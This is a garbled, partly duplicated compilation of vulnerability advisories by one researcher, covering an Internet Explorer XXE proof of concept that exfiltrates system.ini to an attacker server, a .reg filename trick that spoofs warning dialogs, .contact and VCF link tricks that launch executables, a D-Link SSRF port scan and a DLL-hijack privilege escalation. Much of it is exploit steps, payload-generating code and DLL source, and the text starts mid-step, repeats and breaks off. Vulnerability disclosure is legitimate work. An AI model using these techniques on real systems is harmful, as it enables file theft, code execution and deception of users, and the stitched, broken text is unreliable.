4) Open the generated "msie-xxe-0day.mht" file, watch your files be exfiltrated.


#Microsoft Internet Explorer XXE 0day
#Creates malicious XXE .MHT and XML files
#Open the MHT file in MSIE locally, should exfil system.ini
#By hyp3rlinx 
#ApparitionSec

ATTACKER_IP="localhost"
PORT="8000"

mht_file=(
'From:\n'
'Subject:\n'
'Date:\n'
'MIME-Version: 1.0\n'
'Content-Type: multipart/related; type="text/html";\n'
'\tboundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001"\n'
'This is a multi-part message in MIME format.\n\n\n'

'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001\n'
'Content-Type: text/html; charset="UTF-8"\n'
'Content-Location: main.htm\n\n'

'http://www.w3.org/TR/html4/transitional.dtd;>\n'
'\n'
'\n'
'\n'
'MSIE XXE 0day\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'%sp;\n'
'%param1;\n'
']>\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'window.print();\n'
'\n'
'\n'
'\n'
'MSIE XML External Entity 0day PoC.\n'
'Discovery: hyp3rlinx\n'
'ApparitionSec\n'
'\n'
'\n'
'\n'
'\n'
'\n\n\n'

'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001--'
)

xml_file=(
'\n'
'">\n'
'\n'
'">\n'
)

def mk_msie_0day_filez(f,p):
f=open(f,"wb")
f.write(p)
f.close()


if __name__ == "__main__":
mk_msie_0day_filez("msie-xxe-0day.mht",mht_file)
mk_msie_0day_filez("datatears.xml",xml_file)
print "Microsoft Internet Explorer XML External Entity 0day PoC."
print "Files msie-xxe-0day.mht and datatears.xml Created!."
print "Discovery: Hyp3rlinx / Apparition Security"




[Network Access]
Remote



[Severity]
High



[Disclosure Timeline]
Vendor Notification: March 27, 2019
Vendor acknowledgement: March 27, 2019 
Case Opened: March 28, 2019
MSRC reponse April 10, 2019: "We determined that a fix for this issue will be 
considered in a future version of this product or service.
At this time, we will not be providing ongoing updates of the status of the fix 
for this issue, and we have closed this case."
April 10, 

Microsoft Internet Explorer v11 XML External Entity Injection 0day

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt
[+] ISR: ApparitionSec  
 

[Vendor]
www.microsoft.com


[Product]
Microsoft Internet Explorer v11
(latest version)

Internet Explorer is a series of graphical web browsers developed by Microsoft 
and included in the Microsoft Windows line of operating systems, starting in 
1995.


[Vulnerability Type]
XML External Entity Injection



[CVE Reference]
N/A



[Security Issue]
Internet Explorer is vulnerable to XML External Entity attack if a user opens a 
specially crafted .MHT file locally.

This can allow remote attackers to potentially exfiltrate Local files and 
conduct remote reconnaissance on locally installed
Program version information. Example, a request for "c:\Python27\NEWS.txt" can 
return version information for that program.

Upon opening the malicious ".MHT" file locally it should launch Internet 
Explorer. Afterwards, user interactions like duplicate tab "Ctrl+K"
and other interactions like right click "Print Preview" or "Print" commands on 
the web-page may also trigger the XXE vulnerability.

However, a simple call to the window.print() Javascript function should do the 
trick without requiring any user interaction with the webpage.
Importantly, if files are downloaded from the web in a compressed archive and 
opened using certain archive utilities MOTW may not work as advertised.

Typically, when instantiating ActiveX Objects like "Microsoft.XMLHTTP" users 
will get a security warning bar in IE and be prompted
to activate blocked content. However, when opening a specially crafted .MHT 
file using malicious  markup tags the user will get no such
active content or security bar warnings.

e.g.

C:\sec>python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 -
127.0.0.1 - - [10/Apr/2019 20:56:28] "GET 
/?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dlltimer=timer.drv[mci]
 HTTP/1.1" 200 -


Tested successfully in latest Internet Explorer Browser v11 with latest 
security patches on Win7/10 and Server 2012 R2.



[POC/Video URL]
https://vimeo.com/329717404



[Exploit/POC]
POC to exfil  Windows "system.ini" file.
Note: Edit attacker server IP in the script to suit your needs.

1) Use below script to create the "datatears.xml" XML and XXE embedded 
"msie-xxe-0day.mht" MHT file.

2) python -m SimpleHTTPServer

3) Place the generated "datatears.xml" in Python server web-root.

4) Open the generated "msie-xxe-0day.mht" file, watch your files be exfiltrated.


#Microsoft Internet Explorer XXE 0day
#Creates malicious XXE .MHT and XML files
#Open the MHT file in MSIE locally, should exfil system.ini
#By hyp3rlinx 
#ApparitionSec

ATTACKER_IP="localhost"
PORT="8000"

mht_file=(
'From:\n'
'Subject:\n'
'Date:\n'
'MIME-Version: 1.0\n'
'Content-Type: multipart/related; type="text/html";\n'
'\tboundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001"\n'
'This is a multi-part message in MIME format.\n\n\n'

'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001\n'
'Content-Type: text/html; charset="UTF-8"\n'
'Content-Location: main.htm\n\n'

'http://www.w3.org/TR/html4/transitional.dtd;>\n'
'\n'
'\n'
'\n'
'MSIE XXE 0day\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'%sp;\n'
'%param1;\n'
']>\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'window.print();\n'
'\n'
'\n'
'\n'
'MSIE XML External Entity 0day PoC.\n'
'Discovery: hyp3rlinx\n'
'ApparitionSec\n'
'\n'
'\n'
'\n'
'\n'
'\n\n\n'

'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001--'
)

xml_file=(
'\n'
'">\n'
'\n'
'">\n'
)

def mk_msie_0day_filez(f,p):
f=open(f,"wb")
f.write(p)
f.close()


if __name__ == "__main__":
mk_msie_0day_filez("msie-xxe-0day.mht",mht_file)
mk_msie_0day_filez("datatears.xml",xml_file)
print "Microsoft Internet Explorer XML External Entity 0day PoC."
print "Files msie-xxe-0day.mht and datatears.xml Created!."
print "Discovery: Hyp3rlinx / Apparition Security"




[Network Access]
Remote



[Severity]
High



[Disclosure Timeline]
Vendor Notification: March 27, 2019
Vendor acknowledgement: March 27, 2019 
Case Opened: March 28, 2019
MSRC reponse April 10, 2019: "We determined that a fix for this issue will be 
considered in a future version of this product or service.
At this time, we will not be providing ongoing updates of the status of the fix 
for this issue, and we have closed this case."
April 10, 2019 : Public Di

Microsoft Windows .Reg File Dialog Box Message Spoofing 0day

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt
[+] ISR: ApparitionSec  
 

[Vendor]
www.microsoft.com


[Product]
A file with the .reg file extension is a Registration file used by the Windows 
registry. These files can contain hives, keys, and values.
.reg files can be created from scratch in a text editor or can be produced by 
the Windows registry when backing up parts of the registry.


[Vulnerability Type]
Windows .Reg File Dialog Box Message Spoofing


[CVE Reference]
N/A


[Security Issue]
The Windows registry editor allows specially crafted .reg filenames to spoof 
the default registry dialog warning box presented to an end user.
This can potentially trick unsavvy users into choosing the wrong selection 
shown on the dialog box. Furthermore, we can deny the registry editor
its ability to show the default secondary status dialog box (Win 10), thereby 
hiding the fact that our attack was successful.

Normally when a user opens a .reg file UAC will launch, after they will get the 
registry security warning dialog box asking them if they
"trust the source" and "Are you sure you want to continue?" etc and will also 
have a choice of either 'Yes' or 'No' to select from.

However, we can inject our own messages thru the filename to direct the user to 
wrongly click "Yes", as the expected "Are you sure you want to continue?"
dialog box message is under our control. The registry dialog echoes back the 
filename plus any text we add and allows us to terminate part of its
default security warning message. We achieve this using % encoded characters in 
the filename like %n or %r and %0.

Example, the "do not add it to the registry" and "Are you sure you want to 
continue?" default warning messages can be done away with using %0.

This spoofing flaw lets us spoof the "Are you sure you want to continue?" 
warning message to instead read "Click Yes" or whatever else we like.
Potentially making a user think they are cancelling the registry import as the 
security warning dialog box is now lying to them.

Denial of secondary registry editor status dialog box (hiding successful 
attacks) in Windows 10:

Typically, upon a successful import the registry editor pops up another dialog 
box with a status message telling us
"the keys and values contained in  have been successfully added to the 
registry".

We can obstruct that behavior to deny this secondary registry editor dialog 
from appearing by tacking on a (null) right before the
end of our filename using %1 or %25 like: 
"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"

If don't want to use (null) use %3 but it will display a asian char instead but 
still prevents the secondary registry dialog box you.
You will have to manually refresh the registry written to in order to see the 
values stored when using these dialog denial of service methods.

Note: Denial of the secondary dialog box seems to only work on Windows 10.

Behaviors I discovered playing with registry filenames that affect the dialog 
box, depending on Windows OS version you will get different results.

% - can be used for obfuscation e.g. %h%a%t%e = hate
%b will create white-space
%n makes a newline
%r makes a newline
%1 creates (null) - important as we prevent the second registry dialog from 
appearing after a successful import!
%0 Important terminates string
%25 (Windows 10) creates (null) - Important as we prevent the second registry 
dialog from appearing after a successful import!
%3 - Important as we prevent the second registry dialog from appearing after a 
successful import! (but shows asian char)
%5 (Windows 10) duplicates the default registry dialog box message by "n" 
amount of times per amount of %5 injected into the filename 
%25 (Windows 7) duplicates the default registry dialog box message by "n" 
amount of times per amount of %25 injected into the filename 
%2525 prevents registry editor from opening
%169 will show our junky filename in the dialog box (we don't want that)
%3, %197, %17 and some others change the default language shown in the registry 
dialog box to asian characters etc

Each injected character can be separated by a percent "%" sign without messing 
up our spoofed message, we can leverage this to obfuscate the end of the 
filename.
We then use %0 to terminate the message string so that the second .reg 
extension and default registry messages are not displayed in the registry 
dialog box.

The filename 
"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"
 will show as "Microsoft-Security-Update-v1.2-

[**UPDATED] Microsoft Windows .Reg File Dialog Box Message Spoofing 0day

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt
[+] ISR: ApparitionSec  
 

[Vendor]
www.microsoft.com


[Product]
A file with the .reg file extension is a Registration file used by the Windows 
registry. These files can contain hives, keys, and values.
.reg files can be created from scratch in a text editor or can be produced by 
the Windows registry when backing up parts of the registry.


[Vulnerability Type]
Windows .Reg File Dialog Box Message Spoofing


[CVE Reference]
N/A


[Security Issue]
The Windows registry editor allows specially crafted .reg filenames to spoof 
the default registry dialog warning box presented to an end user.
This can potentially trick unsavvy users into choosing the wrong selection 
shown on the dialog box. Furthermore, we can deny the registry editor
its ability to show the default secondary status dialog box (Win 10), thereby 
hiding the fact that our attack was successful.

Normally when a user opens a .reg file UAC will launch (if user is run as 
Admin) if targeting a non privleged user we can still hijack HKCU reg settings
without having to deal with UAC. After they will get the registry security 
warning dialog box asking them if they "trust the source" and
"Are you sure you want to continue?" etc and will also have a choice of either 
'Yes' or 'No' to select from.

However, we can inject our own messages thru the filename to direct the user to 
wrongly click "Yes", as the expected "Are you sure you want to continue?"
dialog box message is under our control. The registry dialog echoes back the 
filename plus any text we add and allows us to terminate part of its
default security warning message. We achieve this using % encoded characters in 
the filename like %n or %r and %0.

Example, the "do not add it to the registry" and "Are you sure you want to 
continue?" default warning messages can be done away with using %0.

This spoofing flaw lets us spoof the "Are you sure you want to continue?" 
warning message to instead read "Click Yes" or whatever else we like.
Potentially making a user think they are cancelling the registry import as the 
security warning dialog box is now lying to them.

Denial of secondary registry editor status dialog box (hiding successful 
attacks) in Windows 10:

Typically, upon a successful import the registry editor pops up another dialog 
box with a status message telling us
"the keys and values contained in  have been successfully added to the 
registry".

We can obstruct that behavior to deny this secondary registry editor dialog 
from appearing by tacking on a (null) right before the
end of our filename using %1 or %25 like: 
"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"

If don't want to use (null) use %3 but it will display a asian char instead but 
still prevents the secondary registry dialog box you.
You will have to manually refresh the registry written to in order to see the 
values stored when using these dialog denial of service methods.

Note: Denial of the secondary dialog box seems to only work on Windows 10.

Behaviors I discovered playing with registry filenames that affect the dialog 
box, depending on Windows OS version you will get different results.

% - can be used for obfuscation e.g. %h%a%t%e = hate
%b will create white-space
%n makes a newline
%r makes a newline
%1 creates (null) - important as we prevent the second registry dialog from 
appearing after a successful import!
%0 Important terminates string
%25 (Windows 10) creates (null) - Important as we prevent the second registry 
dialog from appearing after a successful import!
%3 - Important as we prevent the second registry dialog from appearing after a 
successful import! (but shows asian char)
%5 (Windows 10) duplicates the default registry dialog box message by "n" 
amount of times per amount of %5 injected into the filename 
%25 (Windows 7) duplicates the default registry dialog box message by "n" 
amount of times per amount of %25 injected into the filename 
%2525 prevents registry editor from opening
%169 will show our junky filename in the dialog box (we don't want that)
%3, %197, %17 and some others change the default language shown in the registry 
dialog box to asian characters etc

Each injected character can be separated by a percent "%" sign without messing 
up our spoofed message, we can leverage this to obfuscate the end of the 
filename.
We then use %0 to terminate the message string so that the second .reg 
extension and default registry messages are not displayed in the registry 
dialog box.

The filename 
"Microsoft

Microsoft Windows ".contact" File HTML Injection Mailto: Link Remote Code Execution 0day ZDI-CAN-75

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-HTML-INJECTION-MAILTO-LINK-ARBITRARY-CODE-EXECUTION.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program
[+] ZDI-CAN-7591


[Vendor]
www.microsoft.com


[Product]
Microsoft .CONTACT File

A file with the CONTACT file extension is a Windows Contact file. They're used 
in Windows 10, Windows 8, Windows 7, and Windows Vista.
This is the folder where CONTACT files are stored by default: 
C:\Users\[USERNAME]\Contacts\.


[Vulnerability Type]
Mailto: HTML Link Injection Remote Code Execution


[Security Issue]
This vulnerability allows remote attackers to execute arbitrary code on 
vulnerable installations of Microsoft Windows.
User interaction is required to exploit this vulnerability in that the target 
must visit a malicious page or open a malicious file.

The flaw is due to the processing of ".contact" files, the E-mail address field 
takes an expected E-mail address value, however the .CONTACT file is 
vulnerable to HTML injection as no validation is performed. Therefore, if an 
attacker references an executable file using an HREF tag it will run that
instead without warning instead of performing the expected email behavior. This 
is dangerous and would be unexpected to an end user.

The E-mail addresses Mailto: will point to an arbitrary executable like.
p...@microsoft.com

Additionally the executable file can live in a sub-directory and be referenced 
like "p...@microsoft.com" or attackers can use
directory traversal techniques to point to a malware say sitting in the targets 
Downloads directory like:

p...@microsoft.com

Making matters worse is if the the files are compressed then downloaded "mark 
of the web" (MOTW) may potentially not work as expected using certain archive 
utils.

This advisory was initially one of three different vulnerabilities I reported 
to Zero Day Initiative Program (ZDI), that microsoft decided to not release a 
security fix
for and close. The first cases I reported to ZDI were .VCF and .CONTACT files 
Website address input fields.

This example is yet another vector affecting Windows .CONTACT files and is 
being released as the .CONTACT file issue is now publicly known.


[Exploit/POC]
Create a Windows .CONTACT file and inject the following HTML into the E-mail: 
field

p...@microsoft.com

Windows will prompt you like "The e-mail address you have entered is not a 
valid internet e-mail address. Do you still want to add this address?"

Click Yes.

Open the .CONTACT file and click the Mailto: link BOOM! Windows calculator will 
execute.


Attacker supplied code is not limited to .EXE, .CPL or .COM as .VBS files will 
also execute! :)


[POC Video URL]
https://vimeo.com/312824315


[Disclosure Timeline]
Reported to ZDI 2018-11-22 (ZDI-CAN-7591)
Another separate vulnerability affecting MS Windows .contact files affected the 
Website address input fields and was publicly disclosed January 16, 2019.
https://www.zerodayinitiative.com/advisories/ZDI-19-121/
Public disclosure : January 22, 2019
 

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Microsoft Windows VCF File Insufficient UI Warning Remote Code Execution 0day ZDI-CAN-6920

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-FILE-INSUFFICIENT-WARNING-REMOTE-CODE-EXECUTION.txt
[+] ISR: ApparitionSec   
[+] Zero Day Initiative Program



[Vendor]
www.microsoft.com


[Product]
A VCF file is a standard file format for storing contact information for a 
person or business.
Microsoft Outlook supports the vCard and vCalendar features. These are a 
powerful new approach to electronic Personal Data Interchange (PDI).



[Vulnerability Type]
Insufficient UI Warning Remote Code Execution



[CVE Reference]
ZDI-19-013
ZDI-CAN-6920


[Security Issue]
This vulnerability allows remote attackers to execute arbitrary code on 
vulnerable installations of Microsoft Windows.
User interaction is required to exploit this vulnerability in that the target 
must visit a malicious page or open a malicious file.

The specific flaw exists within the processing of VCard files. Crafted data in 
a VCard file can cause Windows to display a dangerous hyperlink.
The user interface fails to provide any indication of the hazard.

An attacker can leverage this vulnerability to execute code in the context of 
the current user.


[Exploit/POC]
1) create a directory and name it "http" this will house the .CPL executable 
file.


2) create a .CPL file and give it a website name, I named mine 
"www.hyp3rlinx.altervista.cpl" 
or whatever website you wish so it can be referenced in the VCF file.

#include 

/* hyp3rlinx */

/*
gcc -c -m32 hyp3rlinx.altervista.c
gcc -shared -m32 -o hyp3rlinx.altervista.cpl hyp3rlinx.altervista.o
*/

void ms_vcf_0day(){
 MessageBox( 0, "Continue with install?" , "TrickyDealC0der :)" , 
MB_YESNO + MB_ICONQUESTION );
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){
switch(fdwReason){
case DLL_PROCESS_ATTACH:{
 ms_vcf_0day();
break;
}
case DLL_PROCESS_DETACH:{
 ms_vcf_0day();
break;
}
case DLL_THREAD_ATTACH:{
 ms_vcf_0day();
break;
}
case DLL_THREAD_DETACH:{
 ms_vcf_0day();
break;
}
}

  return TRUE;
}



3) make sure to rename the executable .DLL extension to a .CPL extension if you 
did not follow compile instructions above to output as ".CPL".
e.g. hyp3rlinx.altervista.dll --> hyp3rlinx.altervista.cpl



4) Create .VCF mail file I named mine "trickyDealC0der.vcf"

For the URL in the .VCF Mail file specify a URL like...
URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl

The Windows .VCF File content:

"trickyDealC0der.vcf"

BEGIN:VCARD
VERSION:4.0
N:Tricky;DealC0der;;;
FN:TrickyDealC0der
EMAIL;TYPE=home;PREF=1:M$@PwnedAgain.com
TEL;TYPE="cell,home";PREF=1:tel:+000-000-
ADR;TYPE=home;PREF=1:;;1 NYC;NY;;WC2N;USA
URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl
END:VCARD



Now, open the "trickyDealC0der.vcf" file and click the website link, the VCF 
file will traverse back one to the "http" directory where
our CPL executable file lives and KABOOM! :)



[References]
https://www.zerodayinitiative.com/advisories/ZDI-19-013/



[Network Access]
Remote



[POC Video URL]
https://vimeo.com/310684003



[Disclosure Timeline]
Notification: Trend Micro Zero Day Initiative Program
2018-07-23 - Vulnerability reported to vendor
2019-01-10 - Coordinated public release of advisory
2019-01-10 - Advisory Updated

ADDITIONAL DETAILS  
08/06/18 - ZDI reported the vulnerability to the vendor
08/07/18 - The vendor acknowledged the report and provided a tracking #
10/01/18 – The vendor requested an additional file
10/03/18 – ZDI provided added files and a new PoC
10/03/18 – The vendor advised the report did not meet the bar for service
10/05/18 – ZDI advised that we believe the report is exploitable and notified 
the vendor of the intent to 0-day on 10/16/18
10/08/18 – The vendor advised ZDI they had re-considered a fix and requested an 
extension to 01/08/19
10/09/18 – ZDI agreed to the short extension
11/14/18 – The vendor again advised ZDI of the target patch date 01/08/19
12/12/18 – The vendor provided ZDI a CVE
12/19/18 - The vendor wrote to ZDI to advise that “engineering team had decided 
to pursue the fix as v.Next” and “Microsoft has decided that it will not be 
fixing this vulnerability and we are closing this case”
12/27/18 – ZDI notified the vendor of the intent to 0-day on 01/07/18



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistri

Microsoft Windows VCF File Insufficient UI Warning Remote Code Execution 0day ZDI-CAN-6920

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-FILE-INSUFFICIENT-WARNING-REMOTE-CODE-EXECUTION.txt
[+] ISR: ApparitionSec   
[+] Zero Day Initiative Program



[Vendor]
www.microsoft.com


[Product]
A VCF file is a standard file format for storing contact information for a 
person or business.
Microsoft Outlook supports the vCard and vCalendar features. These are a 
powerful new approach to electronic Personal Data Interchange (PDI).



[Vulnerability Type]
Insufficient UI Warning Remote Code Execution



[CVE Reference]
ZDI-19-013
ZDI-CAN-6920


[Security Issue]
This vulnerability allows remote attackers to execute arbitrary code on 
vulnerable installations of Microsoft Windows.
User interaction is required to exploit this vulnerability in that the target 
must visit a malicious page or open a malicious file.

The specific flaw exists within the processing of VCard files. Crafted data in 
a VCard file can cause Windows to display a dangerous hyperlink.
The user interface fails to provide any indication of the hazard.

An attacker can leverage this vulnerability to execute code in the context of 
the current user.


[Exploit/POC]
1) create a directory and name it "http" this will house the .CPL executable 
file.


2) create a .CPL file and give it a website name, I named mine 
"www.hyp3rlinx.altervista.cpl" 
or whatever website you wish so it can be referenced in the VCF file.

#include 

/* hyp3rlinx */

/*
gcc -c -m32 hyp3rlinx.altervista.c
gcc -shared -m32 -o hyp3rlinx.altervista.cpl hyp3rlinx.altervista.o
*/

void ms_vcf_0day(){
 MessageBox( 0, "Continue with install?" , "TrickyDealC0der :)" , 
MB_YESNO + MB_ICONQUESTION );
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){
switch(fdwReason){
case DLL_PROCESS_ATTACH:{
 ms_vcf_0day();
break;
}
case DLL_PROCESS_DETACH:{
 ms_vcf_0day();
break;
}
case DLL_THREAD_ATTACH:{
 ms_vcf_0day();
break;
}
case DLL_THREAD_DETACH:{
 ms_vcf_0day();
break;
}
}

  return TRUE;
}



3) make sure to rename the executable .DLL extension to a .CPL extension if you 
did not follow compile instructions above to output as ".CPL".
e.g. hyp3rlinx.altervista.dll --> hyp3rlinx.altervista.cpl



4) Create .VCF mail file I named mine "trickyDealC0der.vcf"

For the URL in the .VCF Mail file specify a URL like...
URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl

The Windows .VCF File content:

"trickyDealC0der.vcf"

BEGIN:VCARD
VERSION:4.0
N:Tricky;DealC0der;;;
FN:TrickyDealC0der
EMAIL;TYPE=home;PREF=1:M$@PwnedAgain.com
TEL;TYPE="cell,home";PREF=1:tel:+000-000-
ADR;TYPE=home;PREF=1:;;1 NYC;NY;;WC2N;USA
URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl
END:VCARD



Now, open the "trickyDealC0der.vcf" file and click the website link, the VCF 
file will traverse back one to the "http" directory where
our CPL executable file lives and KABOOM! :)



[References]
https://www.zerodayinitiative.com/advisories/ZDI-19-013/



[Network Access]
Remote



[POC Video URL]
https://vimeo.com/310684003



[Disclosure Timeline]
Notification: Trend Micro Zero Day Initiative Program
2018-07-23 - Vulnerability reported to vendor
2019-01-10 - Coordinated public release of advisory
2019-01-10 - Advisory Updated

ADDITIONAL DETAILS  
08/06/18 - ZDI reported the vulnerability to the vendor
08/07/18 - The vendor acknowledged the report and provided a tracking #
10/01/18 – The vendor requested an additional file
10/03/18 – ZDI provided added files and a new PoC
10/03/18 – The vendor advised the report did not meet the bar for service
10/05/18 – ZDI advised that we believe the report is exploitable and notified 
the vendor of the intent to 0-day on 10/16/18
10/08/18 – The vendor advised ZDI they had re-considered a fix and requested an 
extension to 01/08/19
10/09/18 – ZDI agreed to the short extension
11/14/18 – The vendor again advised ZDI of the target patch date 01/08/19
12/12/18 – The vendor provided ZDI a CVE
12/19/18 - The vendor wrote to ZDI to advise that “engineering team had decided 
to pursue the fix as v.Next” and “Microsoft has decided that it will not be 
fixing this vulnerability and we are closing this case”
12/27/18 – ZDI notified the vendor of the intent to 0-day on 01/07/18



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistri

D-LINK Central WifiManager CWM-100 Server Side Request Forgery CVE-2018-15517

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
[+] ISR: ApparitionSec  
 

***Greetz: indoushka | Eduardo B.***



[Vendor]
us.dlink.com


[Product]
D-LINK Central WifiManager (CWM 100)
Version 1.03 r0098
http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/

D-Link’s free Central WiFiManager is a web-based wireless Access Point 
management tool, enabling you to create and manage multi-site, multi-tenancy 
wireless networks.


[Vulnerability Type]
Server Side Request Forgery


[Affected Component]
MailConnect


[CVE Reference]
CVE-2018-15517


[Security Issue]
Using a web browser or script SSRF can be initiated against internal/external 
systems to conduct port scans by leveraging D-LINKs MailConnect component.

The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 
devices is intended to check a connection to an SMTP server but actually allows
outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by 
an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI.
This can undermine accountability of where scan or connections actually came 
from and or bypass the FW etc. This can be automated via script or using Web 
Browser.


[Exploit/POC]
https://VICTIM-IP/index.php/System/MailConnect/host/port/secure/

reply: OK

Scan internal port 22 SSH:

https://VICTIM-IP/index.php/System/MailConnect/host/VICTIM-IP/port/22/secure/
reply: OK



[Network Access]
Remote



[Severity]
Medium



[Disclosure Timeline]
Vendor Notification: August 8, 2018
Vendor acknowledgement: August 8, 2018
CVE assigned Mitre: August 18, 2018
Request update: August 31, 2018
No reply from vendor
Request update: September 6, 2018
Vendor: "R has begun this month to patch your report." : September 12, 2018
Request update: October 3, 2018
Vendor: "will release a new beta for QA verification by end of this month 
10'2018."
Request update: October 16, 2018
no reply from vendor
Request update: October 23, 2018
Vendor: "It still is schedule to be released by the 31st." : October 23, 2018
Inform vendor of disclosure by November 8, 2018 : October 31, 2018
No reply from vendor
November 8, 2018 : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

D-LINK Central WifiManager CWM-100 Trojan File SYSTEM Privilege Escalation CVE-2018-15515

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SYSTEM-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec  
 

***Greetz: indoushka | Eduardo B.***



[Vendor]
us.dlink.com


[Product]
D-LINK Central WifiManager (CWM 100)
Version 1.03 r0098
http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/

D-Link’s free Central WiFiManager is a web-based wireless Access Point 
management tool, enabling you to create and manage multi-site, multi-tenancy 
wireless networks.


[Vulnerability Type]
Trojan File SYSTEM Privilege Escalation


[Affected Component]
"quserex.dll"


[CVE Reference]
CVE-2018-15515


[Security Issue]
D-Link Central WiFiManager CWM-100 1.03 r0098 devices will load a Trojan horse 
"quserex.dll" and will create a new thread running with SYSTEM integrity.


[Impact]
Code Execution as SYSTEM


[Exploit/POC]
1) Create 32bit DLL named "quserex.dll" and place in "CaptivelPortal.exe" 
directory under the DLINK directory

2) Restart the service "CaptivelPortal"

3) Proof, examine using process monitor (sysinternals)


#include 

/* hyp3rlinx */

/*
gcc -c -m32 quserex.c
gcc -shared -m32 -o quserex.dll quserex.o
*/

void executo(){
  MessageBox(NULL, "Enjoy ur SYSTEM Integrity!", ":)", MB_OK);
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){
 switch(fdwReason){
  case DLL_PROCESS_ATTACH:{
executo();
break;
}
  case DLL_PROCESS_DETACH:{
executo();
break;
}
  case DLL_THREAD_ATTACH:{
executo();
break;
   }
  case DLL_THREAD_DETACH:{
executo();
break;
}
   }
return TRUE;
}



[Network Access]
Local



[Severity]
High



[Disclosure Timeline]
Vendor Notification: August 8, 2018
Vendor acknowledgement: August 8, 2018
CVE assigned Mitre: August 18, 2018
Request update: August 31, 2018
No reply from vendor
Request update: September 6, 2018
